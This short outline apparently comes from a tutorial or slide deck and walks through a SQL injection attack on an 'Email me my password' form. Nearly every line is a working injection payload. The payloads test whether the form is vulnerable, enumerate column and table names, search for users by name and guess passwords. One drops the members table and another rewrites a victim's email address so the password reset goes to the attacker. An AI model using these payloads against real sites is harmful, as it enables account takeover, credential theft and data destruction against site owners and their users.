Email me my password

• Is it vulnerable?
  • ' and somestuff
  • something' or 'x'='x
• Find the field names for this query
  • x' and email is null; --
  • x' and userid is null; --
  • x' and login is null; --
  • x' and login_id is null; --
  • x' and name is null; --
  • x' and full_name is null; --
  • x' and password is null; --
  • x' and passwd is null; --
• Finding tables in the database
  • x' and 1=(select count(*) from phone_numbers); --
  • x' and 1=(select count(*) from address); --
  • x' and 1=(select count(*) from members); --
• Which tables are in this query
  • x' and members.email is null; --
• Finding some users (already found their email addresses)
  • x' or full_name LIKE '%Bob%
• Can brute force password guess (but this takes too long)
  • stuff@localhost.com' and passwd='scoobydoo
• Can also manipulate the database!!
  • x'; DROP TABLE members CASCADE; --
• Have the system give me the password!!!
  • x'; update members set email='hacker@localhost' where email='bobuser@localhost